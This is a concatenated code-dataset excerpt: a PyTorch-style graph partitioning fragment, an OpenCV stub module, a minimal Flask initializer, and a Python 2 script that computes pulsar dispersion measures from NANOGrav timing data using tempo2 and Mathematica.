        # Set up parent partitions and children partitions for each partition
        set_parents_and_children(self.partitions)
        # Get bfs level for each partition
        get_bfs_level_partition(self.partitions)
        find_combination = True
        while find_combination:
            # Search for a pair partition to generate the minimum new cost,
            # then combine them
            find_combination = search_combination(
                transfer_rate_bytes_per_sec,
                node_to_latency_mapping
            )
        # Make sure all partitions are set up correctly.
        reorganize_partitions(self.partitions)
        # Set up node to partition mapping
        self.node_to_partition = get_node_to_partition_mapping(self.partitions)
        return
    def kl_based_partition(
        self,
        transfer_rate_bytes_per_sec: float,
        node_to_latency_mapping: Dict[Node, NodeLatency]
    ) -> None:
        """This function is a cost aware partition based
        on Kernighan-Lin algorithm.
        First, the graph is partitioned using size_based_partition.
        Then, each node is swapped with any other node in a different
        partition, and at the same time, the cost is estimated after
        the swapping.
        For example, we have nodes n0, n1, n2, n3 and n4.
        Using size_based_partition, n0 and n1 are in Partition p0.
        n2, n3 and n4 in Partition p1. The current cost is estimated.
        We first tried using n0 to swap with n2 from the other partition.
        Then we found swapping n0 and n2 shows a lower cost
        than the current cost and it is the minimum among other pairs like
        (n0, None)(This means moving n0 to Partition without swapping other nodes),
        (n0, n3) and (n0, n4). We swap n0 and n2 and set the new cost
        as the current cost.
        Then We repeat this process for all the other nodes until all swapping pairs
        are tried.
        """
        def swap_nodes(n0, n1, p0, p1):
            # Either n0 or n1 could be None
            # That means we simply move the node
            # to another partition
            if n0 is not None:
                p0.remove_node(n0)
                p1.add_node(n0)
            if n1 is not None:
                p0.add_node(n1)
                p1.remove_node(n1)
        def try_swap_nodes(n0, n1, p0, p1, node_to_latency_mapping, transfer_rate_per_sec):
            # NOTE(review): the transfer_rate_per_sec parameter is unused;
            # the closure variable transfer_rate_bytes_per_sec is used below
            # instead -- confirm this is intentional.
            cost = float('inf')
            swap_nodes(n0, n1, p0, p1)
            # Reorganize partitions after swapping
            reorganize_partitions(self.partitions)
            # Check if there is a circular dependency after swapping
            if (not check_dependency(p0)) and (not check_dependency(p1)):
                reset_partition_device(self.partitions)
                partition_to_latency_mapping = get_partition_to_latency_mapping(
                    self.partitions,
                    node_to_latency_mapping
                )
                # Check if all partitions can be mapped to logical devices after swapping
                found_device = get_device_to_partitions_mapping(self.partitions, self.devices)
                if not found_device:
                    cost = float('inf')
                else:
                    cost = get_latency_of_partitioned_graph(
                        self.partitions,
                        partition_to_latency_mapping,
                        transfer_rate_bytes_per_sec
                    )
            # Swap back and reset all partitions back to original
            swap_nodes(n1, n0, p0, p1)
            reorganize_partitions(self.partitions)
            reset_partition_device(self.partitions)
            get_device_to_partitions_mapping(self.partitions, self.devices)
            return cost
        def swap_node_to_partition(node, p0, p1, node_to_latency_mapping, transfer_rate_per_sec):
            """This function helps to swap one node from partition p0
            with all the nodes in another partition p1
            """
            # None stands for "just move node into p1 without a counterpart".
            p1_nodes = list(p1.nodes) + [None]
            min_cost = float('inf')
            node_pair: List[Node] = []
            for n1 in p1_nodes:
                # Ignore the node if it is not a op node
                if n1 is not None and n1.op in {'placeholder', 'get_attr'}:
                    continue
                # Try swapping node in p0 with n1 in p1
                cost = try_swap_nodes(node, n1, p0, p1, node_to_latency_mapping, transfer_rate_per_sec)
                if cost < min_cost:
                    node_pair = [node, n1]
                    min_cost = cost
            # NOTE(review): this returns `cost` (the *last* trial's cost),
            # not `min_cost` which pairs with node_pair -- looks like a bug;
            # confirm whether min_cost was intended.
            return cost, node_pair
        # First use size_base_partition
        self.size_based_partition()
        partition_to_latency_mapping = get_partition_to_latency_mapping(
            self.partitions,
            node_to_latency_mapping
        )
        # Calculate the cost of the partitions
        cost = get_latency_of_partitioned_graph(
            self.partitions,
            partition_to_latency_mapping,
            transfer_rate_bytes_per_sec
        )
        # Keep tracking the node pair that shows the better cost
        node_pair: List[Node] = []
        # Keep tracking the partition pair of node pair
        partition_pair: List[Partition] = []
        # Collect all the op nodes from the graph
        op_nodes = []
        for n in self.graph_module.graph.nodes:
            if n.op not in {'placeholder', 'get_attr', 'output'}:
                op_nodes.append(n)
        for node in op_nodes:
            # Find which partition the current node belongs
            p0_index = self.node_to_partition[node]
            p0 = self.partitions[p0_index]
            # Go through all the other partitions to swap
            # with other nodes from those partitions
            for p1_index, _ in enumerate(self.partitions):
                if p0_index != p1_index:
                    p1 = self.partitions[p1_index]
                    new_cost, new_node_pair = swap_node_to_partition(
                        node,
                        p0,
                        p1,
                        node_to_latency_mapping,
                        transfer_rate_bytes_per_sec
                    )
                    # Update cost and node pair
                    if new_cost < cost:
                        cost = new_cost
                        node_pair = new_node_pair
                        partition_pair = [p0, p1]
            # Do the swapping after trying all the nodes from a partition
            if len(node_pair) != 0:
                swap_nodes(node_pair[0], node_pair[1], partition_pair[0], partition_pair[1])
                reorganize_partitions(self.partitions)
                get_device_to_partitions_mapping(self.partitions, self.devices)
        reorganize_partitions(self.partitions)
        # Mapping the device to the partition
        get_device_to_partitions_mapping(self.partitions, self.devices)
        return
    def aot_based_partition(self, node_to_partition_mapping, partition_to_logical_device_mapping):
        """This function helps to rebuild the partitions given the nodes and its
        corresponding partition id
        """
        partition_id_to_partition_mapping: Dict[int, Partition] = {}
        self.node_to_partition = node_to_partition_mapping
        for node in self.node_to_partition:
            partition_id = self.node_to_partition[node]
            # If the requested partition has not been created, create the partition
            if partition_id not in partition_id_to_partition_mapping:
                partition = Partition(partition_id)
                self.partitions.append(partition)
                partition_id_to_partition_mapping[partition_id] = partition
                partition.logical_device_ids = partition_to_logical_device_mapping[partition_id]
            else:
                partition = partition_id_to_partition_mapping[self.node_to_partition[node]]
            # Add the current node into the partition
            partition.add_node(node)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
f0d8f6c720eb71434eb0ba1ce0acdcdedf4ed128 | 2aace9bb170363e181eb7520e93def25f38dbe5c | /build/idea-sandbox/system/python_stubs/cache/2e033ce6e3a2cdde5174895cadb3b406b2a013729dd641fee2cebd9f7ed97879/cv2/videoio_registry.py | 0be5f4768f19952c2adff113bfb96d3a9ccf5394 | [] | no_license | qkpqkp/PlagCheck | 13cb66fd2b2caa2451690bb72a2634bdaa07f1e6 | d229904674a5a6e46738179c7494488ca930045e | refs/heads/master | 2023-05-28T15:06:08.723143 | 2021-06-09T05:36:34 | 2021-06-09T05:36:34 | 375,235,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,362 | py | # encoding: utf-8
# module cv2.videoio_registry
# from C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
# by generator 1.147
# no doc
# no imports
# Variables with simple values
# Generator placeholders; the real loader/spec are supplied by the
# compiled cv2 extension at import time.
__loader__ = None
__spec__ = None
# functions
def getBackendName(api):
    """
    getBackendName(api) -> retval
    .   @brief Returns backend API name or "UnknownVideoAPI(xxx)"
    .   @param api backend ID (#VideoCaptureAPIs)

    Generated stub -- the real implementation lives in the compiled cv2
    extension; this placeholder body does nothing and returns None.
    """
def getBackends():
    """
    getBackends() -> retval
    .   @brief Returns list of all available backends

    Generated stub -- the real implementation lives in the compiled cv2
    extension; this placeholder body does nothing and returns None.
    """
def getCameraBackends():
    """
    getCameraBackends() -> retval
    .   @brief Returns list of available backends which works via `cv::VideoCapture(int index)`

    Generated stub -- the real implementation lives in the compiled cv2
    extension; this placeholder body does nothing and returns None.
    """
def getStreamBackends():
    """
    getStreamBackends() -> retval
    .   @brief Returns list of available backends which works via `cv::VideoCapture(filename)`

    Generated stub -- the real implementation lives in the compiled cv2
    extension; this placeholder body does nothing and returns None.
    """
def getWriterBackends():
    """
    getWriterBackends() -> retval
    .   @brief Returns list of available backends which works via `cv::VideoWriter()`

    Generated stub -- the real implementation lives in the compiled cv2
    extension; this placeholder body does nothing and returns None.
    """
# no classes
| [
"qinkunpeng2015@163.com"
] | qinkunpeng2015@163.com |
b0128b5d3d809a337ac36802f9c7f3f42460b449 | 8fd303230f4dbc5df510090a6d76b81488b4b76e | /image_service/appengine_version/__init__.py | 58ddf3ffb3c4f8c35d4301e782f7472ec60d5461 | [] | no_license | ferronrsmith/flask_projects | d1a2744b2501b26531ddbc686a4630a28ed3c514 | 4267834bf4596cf8b8a83b9ba9cbd2daa6121a72 | refs/heads/master | 2020-06-05T15:36:40.939652 | 2015-04-02T05:28:56 | 2015-04-02T05:28:56 | 3,476,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | """
Initialize Flask app
"""
from flask import Flask
# Create the WSGI application object and load its settings module.
app = Flask('application')
app.config.from_object('application.settings')
# NOTE(review): imported after `app` is created, presumably so views.py can
# `import app` without a circular import -- confirm against views.py.
import views
| [
"ferronrsmith@gmail.com"
] | ferronrsmith@gmail.com |
e3ccdca5abee0a3a58f7e2e3e62e2ee554307105 | f5dc531a15084a8dfa2e955b393edb9b1141bcfc | /Python Scripts/refineddmplot.py | a1be642ed5c4e3850ae27176b6c7c87d2a89978a | [] | no_license | ggrillo93/fermi-data-analysis | 2d5c368eee67df5d24855c888642836c0a7b3163 | 11728edcdfeee3565680ce6cefa6cbc14f4d2477 | refs/heads/master | 2021-09-08T15:41:49.493281 | 2018-03-10T20:36:34 | 2018-03-10T20:36:34 | 124,696,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,783 | py | #!/usr/bin/env python
import os
import pyfits
import numpy as np
import math
from pylab import *
from matplotlib import pyplot as plt
import csv
from subprocess import call
# Interactive inputs (Python 2 `raw_input`): full pulsar name
# (e.g. "J1713+0747") and the space-separated processing modes.
fullpulsar=raw_input('Enter pulsar name: ')
modes=raw_input('Enter modes (Crossband, Dualband and/or Inband): ')
# Short pulsar tag: first five characters of the name, e.g. "J1713".
pulsar=fullpulsar[:5]
def fullText(text):
    """Return every line of the file at *text*, trailing newlines included."""
    with open(text) as handle:
        return handle.readlines()
def columnToList(text, colnumber):
    """Read a whitespace-delimited file and return column *colnumber* as strings."""
    with open(text) as handle:
        return [row.split()[colnumber] for row in handle]
def columnToList2(ptext, colnumber):
    """Return column *colnumber* from an already-loaded sequence of text lines."""
    return [row.split()[colnumber] for row in ptext]
def strToFloat(lista):
    """Convert each token to float; tokens that fail to parse become 0."""
    def _to_float(token):
        try:
            return float(token)
        except ValueError:
            return 0
    return [_to_float(token) for token in lista]
def positionLast(x, s):
    """Index of the last occurrence of *x* in *s*, or None when absent."""
    for idx in range(len(s) - 1, -1, -1):
        if s[idx] == x:
            return idx
    return None
def positionFirst(x, s):
    """Index of the first occurrence of *x* in *s*, or None when absent."""
    for idx, item in enumerate(s):
        if item == x:
            return idx
    return None
def formatted(lista):
    """Normalize Mathematica-style number strings.

    '*' becomes 'e' (exponent marker) and the characters '^', '{' and ','
    are dropped; everything else passes through unchanged.
    """
    table = str.maketrans('*', 'e', '^{,')
    return [dm.translate(table) for dm in lista]
def formatted2(lista):
    """Drop the trailing character from every string in *lista*."""
    return [item[:-1] for item in lista]
def findBeginning(tempofile):
    """Index of the first line starting with 'St' (tempo2 data header).

    If no line matches, the loop falls through and the last index is
    returned, mirroring the original implementation's behaviour.
    """
    for index, line in enumerate(tempofile):
        if line.startswith('St'):
            break
    return index
def epochDivider(epochloc, variable):
    """Slice *variable* into per-epoch chunks given inclusive [start, end] index pairs."""
    return [variable[start:end + 1] for start, end in epochloc]
def setMode(mode):
    # Build the Mathematica input directory for the current pulsar and
    # analysis mode (crossband / dualband / inband), creating it on demand.
    # NOTE(review): relies on the module-level `pulsar` global being set
    # earlier in the script.
    mathinputdir="/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Input/"+pulsar+"/"+mode
    if not os.path.exists(mathinputdir):
        os.makedirs(mathinputdir)
    return mathinputdir
# Run tempo2 on pulsar
os.chdir("/home/ggrillo93/Documents/Research/NANOGrav/DM/Tempo2/Original/") # tempo files location
first='tempo2 -output general2 -f '+fullpulsar+'_NANOGrav_9yv1.gls.par '+fullpulsar+'_NANOGrav_9yv1.tim '
second='-s "{freq} {pre} {bat} {err}\n" > '+pulsar+'.txt'
os.system(first+second)
os.system('mv '+pulsar+'.txt /home/ggrillo93/Documents/Research/NANOGrav/DM/"iPython NB"/Input') # location of tempo output
os.chdir("/home/ggrillo93/Documents/Research/NANOGrav/DM/iPython NB")
# Open par file
parfile="/home/ggrillo93/Documents/Research/NANOGrav/DM/Tempo2/Original/" + fullpulsar + "_NANOGrav_9yv1.gls.par"
parameters=columnToList(parfile,0)
parvalue=columnToList(parfile,1)
dmxfile=fullText('/home/ggrillo93/Documents/Research/NANOGrav/DM/Tempo2/Gamma/NNstar-F2/'+fullpulsar+'/'+fullpulsar+'.dmt')[3:]
# Locate lines containing lowest observation frequency for each epoch
dmxf1loc=[]
for n in range(0,len(parameters)):
par=parameters[n]
if par[:5] == 'DMXF1':
dmxf1loc.append(n)
# Locate lines containing highest observation frequency for each epoch
dmxf2loc=[]
for n in range(0,len(parameters)):
par=parameters[n]
if par[:5] == 'DMXF2':
dmxf2loc.append(n)
# Record lowest observation frequency for each epoch
dmxf1=[]
for loc in dmxf1loc:
dmxfval=parvalue[loc]
dmxf1.append(dmxfval)
dmxf1=strToFloat(dmxf1)
# Record highest observation frequency for each epoch
dmxf2=[]
for loc in dmxf2loc:
dmxfval=parvalue[loc]
dmxf2.append(dmxfval)
dmxf2=strToFloat(dmxf2)
# Locate epochs containing observations in one band only
diff=np.subtract(dmxf2,dmxf1)
singlebandloc=[]
for n in range(0,len(diff)):
if diff[n] < 1000:
singlebandloc.append(n)
# Locate lines containing DMX values for each epoch
dmxloc=[]
for n in range(0,len(parameters)):
par=parameters[n]
if par[:5] == 'DMX_0':
dmxloc.append(n)
# Record DMX value in tempo2 format
tdmx=[]
for loc in dmxloc:
dmxval=parvalue[loc]
tdmx.append(dmxval)
# Transform DMX values from par file format to Python
dmx=[]
for dmxvalue in tdmx:
newdmxvalue=''
for ch in dmxvalue:
if ch != 'D':
newdmxvalue=newdmxvalue+ch
else:
newdmxvalue=newdmxvalue+'e'
dmx.append(newdmxvalue)
dmx=strToFloat(dmx)
# Locate lines containing epoch ranges
dmxrangeloc=[]
for n in range(0,len(parameters)):
par=parameters[n]
if par[:4] == 'DMXR':
dmxrangeloc.append(n)
# Record ranges values for each epoch
dmxr=[]
for loc in dmxrangeloc:
day=parvalue[loc]
dmxr.append(day)
dmxr=strToFloat(dmxr)
# Rearrange ranges values in pairs
dmxranges=[]
for n in range(0,len(dmxr)-1,2):
r=[dmxr[n],dmxr[n+1]]
dmxranges.append(r)
# Assign a particular MJD to each epoch
epochdays=[]
for dmxpair in dmxranges:
av=(dmxpair[0]+dmxpair[1])/2.0
epochdays.append(av)
# Modify lists to remove data for epochs containing only single band observations
adjsbloc=[]
for n in range(0,len(singlebandloc)):
new=singlebandloc[n]-n
adjsbloc.append(new)
for loc in adjsbloc:
del epochdays[loc]
del dmxranges[loc]
del dmxf1[loc]
del dmxf2[loc]
del dmx[loc]
del dmxfile[loc]
# Analyze dmxf1 and dmxf2 to generate list of observation frequencies
f1min=min(dmxf1)
obsfreqs=[]
if f1min > 700 and f1min < 800:
f1='820 MHz'
obsfreqs.append(f1)
if f1min < 500:
f1='430 MHz'
obsfreqs.append(f1)
if f1min > 1000:
f1='1410 MHz'
obsfreqs.append(f1)
f2max=max(dmxf2)
if f2max > 1800 and f2max < 1900:
f2='1500 MHz'
obsfreqs.append(f2)
if f2max > 1700 and f2max < 1800:
f2='1410 MHz'
obsfreqs.append(f2)
if f2max > 2000:
f2='2030 MHz'
obsfreqs.append(f2)
if f1 == '430 MHz' and f2=='2030 MHz':
f2='1410 MHz'
f3='2030 MHz'
obsfreqs=[f1,f2,f3]
# Open tempo2 output and delete unnecessary lines
rawallbands="/home/ggrillo93/Documents/Research/NANOGrav/DM/iPython NB/Input/"+pulsar+".txt"
allbands=fullText(rawallbands)
beg=findBeginning(allbands)
allbands=allbands[beg+1:-2]
# Extract frequencies, residuals, TOAs, and errors from tempo2 file
freq=strToFloat(columnToList2(allbands,0))
res=strToFloat(columnToList2(allbands,1))
toas=strToFloat(columnToList2(allbands,2))
err=strToFloat(columnToList2(allbands,3))
# Sort quantities based on TOAs
l = sorted(zip(toas, freq, res, err), key=lambda x: x[0])
stoas, sfreq, sres, serr = zip(*sorted(zip(toas, freq, res, err)))
# Locate start and end days for each epoch
rtoas=np.around(stoas,1)
ftoas=np.floor(stoas)
ctoas=np.ceil(stoas)
epochloc=[]
for daypair in dmxranges:
startloc=positionFirst(np.floor(daypair[0]),ftoas)
endloc=positionLast(np.ceil(daypair[1]),ctoas)
locpair=[startloc,endloc]
epochloc.append(locpair)
faultypair=None
noneloc=None
for locpair in epochloc:
if None in locpair:
faultypair=locpair
noneloc=locpair.index(None)
if faultypair != None:
faultyloc=epochloc.index(faultypair)
if noneloc == 0:
epochloc[faultyloc][0]=epochloc[faultyloc-1][1]
elif noneloc == 1:
epochloc[faultyloc][1]=epochloc[faultyloc+1][0]
# Create list of 1/freq^2
invfreq=[]
for freq in sfreq:
new=1.0/freq**2
invfreq.append(new)
# Divide quantities by epoch
freqepochs=epochDivider(epochloc,sfreq)
invfreqepochs=epochDivider(epochloc,invfreq)
resepochs=epochDivider(epochloc,sres)
errepochs=epochDivider(epochloc,serr)
if 'crossband' in modes or 'Crossband' in modes:
# Generate crossband points
mathinputdir=setMode('crossband')
mode='crossband'
# Write quantities to files
data=[invfreqepochs,resepochs,errepochs]
n = 0
for y in range(0,len(invfreqepochs)):
if n < 10:
with open(mathinputdir+"/epoch" + str(0) + str(n) +".txt", "w") as f:
varlist = []
for x in range(0,3):
var = data[x][y]
varlist.append(var)
for i in zip(*varlist):
f.write("{0}\t{1}\t{2}\n".format(*i))
f.close()
n=n+1
else:
with open(mathinputdir+"/epoch" + str(n) +".txt", "w") as f:
varlist = []
for x in range(0,3):
var = data[x][y]
varlist.append(var)
for i in zip(*varlist):
f.write("{0}\t{1}\t{2}\n".format(*i))
f.close()
n=n+1
path='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar
if not os.path.exists(path):
os.makedirs('/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar)
# Write Mathematica script
line1='files' + '= FileNames["*.txt",'+'"'+mathinputdir+'"'+'];'
line2='data = Import[#, "Data"] & /@ files;'
line3='m = OpenWrite["/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/'+mode+'.txt"];'
line4='Do[epoch = data[[i]];'
line5='freq = epoch[[All, 1]];'
line6='res = epoch[[All, 2]];'
line7='err = epoch[[All, 3]]*10^-6;'
line8='data1 = Transpose@{freq, res};'
line9='fit = LinearModelFit[data1, x, x, Weights -> 1/err^2,VarianceEstimatorFunction -> (1 &)];'
line10='fit2 = Normal[LinearModelFit[data1, x, x, Weights -> 1/err^2,VarianceEstimatorFunction -> (1 &)]];'
line11='f = 0.000241022;'
line12='t = Expand[f*fit2];'
line13='error = f*fit["ParameterErrors"];'
line14='error2 = Last[error];'
line15='Write[m, {D[t, x]*-1, error2}], {i,'+str(len(epochdays))+'}];'
line16='Close[m]'
lines=[]
for n in range(1,17):
line=eval('line'+str(n))
lines.append(line)
with open(mathinputdir+"/temp.txt", "w") as f:
for item in lines:
f.write("%s\n" % item)
# Run Mathematica script
os.chdir(mathinputdir)
call(['math','-script','temp.txt'])
if 'dualband' in modes or 'Dualband' in modes or 'inband' in modes or 'Inband' in modes: # Need this for dualband and inband
# Determine location of frequency bands
freqloc=[]
for epoch in freqepochs:
f1=[]
f2=[]
f3=[]
for n in range(len(epoch)):
f=epoch[n]
if obsfreqs==['820 MHz','1500 MHz']:
if f < 1000:
f1.append(n)
else:
f2.append(n)
if obsfreqs==['430 MHz','1410 MHz']:
if f < 800:
f1.append(n)
else:
f2.append(n)
if obsfreqs==['1410 MHz','2030 MHz']:
if f < 1761:
f1.append(n)
else:
f2.append(n)
if len(obsfreqs)==3:
if f < 800:
f1.append(n)
elif f < 1761:
f2.append(n)
else:
f3.append(n)
if len(obsfreqs)==3:
epochfreqloc=[f1,f2,f3]
else:
epochfreqloc=[f1,f2]
freqloc.append(epochfreqloc)
# Arrange data based on frequency bands
data=[freqepochs,resepochs,errepochs]
newdata=[]
for d in data:
newdataepochs=[]
for n in range(len(d)):
epoch=d[n]
locepoch=freqloc[n]
newepoch=[]
for i in locepoch:
flist=[]
for s in i:
f=epoch[s]
flist.append(f)
newepoch.append(flist)
newdataepochs.append(newepoch)
newdata.append(newdataepochs)
if 'dualband' in modes or 'Dualband' in modes:
# Generate dual band/triple band points
mathinputdir=setMode('dualband')
mode='dualband'
# Average data
dataav=[]
for d in newdata:
dav=[]
for epoch in d:
epochav=[]
for values in epoch:
av=np.mean(values)
epochav.append(av)
dav.append(epochav)
dataav.append(dav)
# Calculate 1/freq^2
freqav=dataav[0]
invfreqav=[]
for epoch in freqav:
newepoch=[]
for freq in epoch:
invfreq=1.0/freq**2
newepoch.append(invfreq)
invfreqav.append(newepoch)
dataav[0]=invfreqav
# Create columns
columns=[]
for x in range(3):
for z in range(len(obsfreqs)):
column=[]
for y in range(len(epochdays)):
value=dataav[x][y][z]
column.append(value)
columns.append(column)
# Write columns to file
os.chdir("/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Input/"+pulsar+"/dualband/")
with open("dualband.csv", "wb") as f:
writer = csv.writer(f)
writer.writerows(columns)
f.close()
# Write Mathematica script for 3 band pulsar
if len(epochfreqloc)==3:
line1= 'data = Import['+'"'+mathinputdir+'/dualband.csv", "Data"];'
line2= 's = OpenWrite["/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/'+mode+'.txt"];'
line3= 'f1avlist = data[[1]];'
line4= 'f2avlist = data[[2]];'
line5= 'f3avlist = data[[3]];'
line6= 'f1reslist = data[[4]];'
line7= 'f2reslist = data[[5]];'
line8= 'f3reslist = data[[6]];'
line9= 'f1errlist = data[[7]]*10^-6;'
line10= 'f2errlist = data[[8]]*10^-6;'
line11= 'f3errlist = data[[9]]*10^-6;'
line12= 'Do[f1av = f1avlist[[i]];'
line13= 'f2av = f2avlist[[i]];'
line14= 'f3av = f3avlist[[i]];'
line15= 'f1res = f1reslist[[i]];'
line16= 'f2res = f2reslist[[i]];'
line17= 'f3res = f3reslist[[i]];'
line18= 'f1err = f1errlist[[i]];'
line19= 'f2err = f2errlist[[i]];'
line20= 'f3err = f3errlist[[i]];'
line21= 'k = {{{f2av, f2res}, {f3av, f3res}}, {f2err, f3err}};'
line22= 'y = {{{f1av, f1res}, {f2av, f2res}}, {f1err, f2err}};'
line23= 'z = {{{f1av, f1res}, {f2av, f2res}, {f3av, f3res}}, {f1err, f2err, f3err}};'
line24= 'a = Which[f1av === "nan", k, f3av === "nan", y, f1av =!= "nan" && f3av =!= "nan", z];'
line25= 'data2 = a[[1]]; err = a[[2]];'
line26= 'fit = LinearModelFit[data2, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)] // Normal;'
line27= 'fit2 = LinearModelFit[data2, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)] ;'
line28= 'f = 0.000241022;'
line29= 't = Expand[f*fit];'
line30= 'der = D[t, x];'
line31= 'error = Last[fit2["ParameterErrors"]];'
line32= 'adjerr = error*f;'
line33= 'Write[s, {der*-1, adjerr}], {i,'+str(len(epochdays))+'}];'
line34= 'Close[s]'
lines=[]
for n in range(1,35):
line=eval('line'+str(n))
lines.append(line)
# Write Mathematica script for 2 band pulsar
if len(epochfreqloc)==2:
line1= 'data = Import['+'"'+mathinputdir+'/dualband.csv", "Data"];'
line2= 's = OpenWrite["/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/'+mode+'.txt"];'
line3= 'f1avlist = data[[1]];'
line4= 'f2avlist = data[[2]];'
line5= 'f1reslist = data[[3]];'
line6= 'f2reslist = data[[4]];'
line7= 'f1errlist = data[[5]]*10^-6;'
line8= 'f2errlist = data[[6]]*10^-6;'
line9= 'Do[f1av = f1avlist[[i]];'
line10= 'f2av = f2avlist[[i]];'
line11= 'f1res = f1reslist[[i]];'
line12= 'f2res = f2reslist[[i]];'
line13= 'f1err = f1errlist[[i]];'
line14= 'f2err = f2errlist[[i]];'
line15= 'data2 = {{f1av,f1res},{f2av,f2res}}; err = {f1err,f2err};'
line16= 'fit = LinearModelFit[data2, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)] // Normal;'
line17= 'fit2 = LinearModelFit[data2, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)] ;'
line18= 'f = 0.000241022;'
line19= 't = Expand[f*fit];'
line20= 'der = D[t, x];'
line21= 'error = Last[fit2["ParameterErrors"]];'
line22= 'adjerr = error*f;'
line23= 'Write[s, {der*-1, adjerr}], {i,'+str(len(epochdays))+'}];'
line24= 'Close[s]'
lines=[]
for n in range(1,25):
line=eval('line'+str(n))
lines.append(line)
with open(mathinputdir+"/temp.txt", "w") as f:
for item in lines:
f.write("%s\n" % item)
# Run Mathematica script
os.chdir(mathinputdir)
call(['math','-script','temp.txt'])
os.system('rm temp.txt')
if 'inband' in modes or 'Inband' in modes:
# Generate inband data points
mathinputdir=setMode('inband')
mode='inband'
# Rearrange quantities based on epoch
flist = []
for h in range(len(obsfreqs)):
fnlist=[]
for n in range(len(epochdays)):
fepoch=[]
for i in range(len(newdata)):
f=newdata[i][n][h]
fepoch.append(f)
fnlist.append(fepoch)
flist.append(fnlist)
# Create list of available bands
bands=[]
for n in range(1,len(flist)+1):
f='f'+str(n)
bands.append(f)
# Create directory for each band
for s in range(len(bands)):
band=bands[s]
if not os.path.exists(mathinputdir+'/'+band):
os.makedirs(mathinputdir+'/'+band)
# Write data to files
n = 0
for x in range(0,len(epochdays)):
if n < 10:
with open(mathinputdir+'/'+band+"/epoch" + str(0) + str(n) +".txt", "w") as f:
varlist = []
for y in range(0,3):
var = flist[s][x][y]
varlist.append(var)
for i in zip(*varlist):
f.write("{0}\t{1}\t{2}\n".format(*i))
f.close()
n=n+1
else:
with open(mathinputdir+'/'+band+"/epoch" + str(n) +".txt", "w") as f:
varlist = []
for y in range(0,3):
var = flist[s][x][y]
varlist.append(var)
for i in zip(*varlist):
f.write("{0}\t{1}\t{2}\n".format(*i))
f.close()
n=n+1
# Write Mathematica script
line1= 'files = FileNames["*.txt", "'+mathinputdir+'/'+band+'"];'
line2= 'data = Import[#, "Data"] & /@ files;'
line3= 'm = OpenWrite["/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/'+mode+band+'.txt"];'
line4= 'Do[epoch = data[[i]];'
line5= 'freq = 1/epoch[[All, 1]]^2;'
line6= 'res = epoch[[All, 2]];'
line7= 'err = epoch[[All, 3]]*10^-6;'
line8= 'data1 = Transpose@{freq, res};'
line9= 'fit = LinearModelFit[data1, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)];'
line10= 'fit2 = Normal[LinearModelFit[data1, x, x, Weights -> 1/err^2, VarianceEstimatorFunction -> (1 &)]];'
line11= 'f = 0.000241022;'
line12= 't = Expand[f*fit2];'
line13= 'error = f*fit["ParameterErrors"];'
line14= 'error2 = Last[error];'
line15= 'Write[m, {D[t, x]*-1, error2}], {i,'+str(len(epochdays))+'}];'
line16= 'Close[m]'
lines=[]
for n in range(1,17):
line=eval('line'+str(n))
lines.append(line)
with open(mathinputdir+"/temp"+band+".txt", "w") as f:
for item in lines:
f.write("%s\n" % item)
os.chdir(mathinputdir)
call(['math','-script','temp'+band+'.txt']) # Run Mathematica script
os.system('rm temp'+band+' .txt') # Remove temporary file
# Create plotting lists
mathout=[]
legends=[]
colors=[]
if 'crossband' in modes or 'Crossband' in modes:
cb='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/crossband.txt'
mathout.append(cb)
legends.append('Crossband DM')
colors.append('blue')
if 'dualband' in modes or 'Dualband' in modes:
db='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/dualband.txt'
mathout.append(db)
legends.append('Dualband DM')
colors.append('red')
if 'inband' in modes or 'Inband' in modes:
ib1='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/inbandf1.txt'
mathout.append(ib1)
legends.append('Inband DM #1 '+ obsfreqs[0])
colors.append('green')
ib2='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/inbandf2.txt'
mathout.append(ib2)
legends.append('Inband DM #2 '+ obsfreqs[1])
colors.append('orange')
if len(obsfreqs)==3:
ib3='/home/ggrillo93/Documents/Research/NANOGrav/DM/Mathematica/Output/'+fullpulsar+'/inbandf3.txt'
mathout.append(ib3)
legends.append('Inband DM #3 '+ obsfreqs[2])
colors.append('grey')
# Fix errors in Mathematica output files
newout=[]
for out in mathout:
text=fullText(out)
badlines=[]
for line in text:
if not line.startswith('{'):
badlines.append(line)
for bline in badlines:
text.remove(bline)
for n in range(len(text)):
line=text[n]
if line.startswith('{-0.000241022*('):
text[n]='{1000, 0}\n'
newout.append(text)
olddm=[]
for out in newout:
new=columnToList2(out,0)
olddm.append(new)
newdm=[]
for dmlist in olddm:
new=strToFloat(formatted(dmlist))
newdm.append(new)
olddmerr=[]
for out in newout:
new=columnToList2(out,1)
olddmerr.append(new)
newdmerr=[]
for dmerr in olddmerr:
new=strToFloat(formatted(formatted2(dmerr)))
newdmerr.append(new)
dmxerr=np.multiply(strToFloat(columnToList2(dmxfile,2)),1000)
for n in range(0,len(mathout)):
y=np.multiply(1000,newdm[n])
err=np.multiply(1000,newdmerr[n])
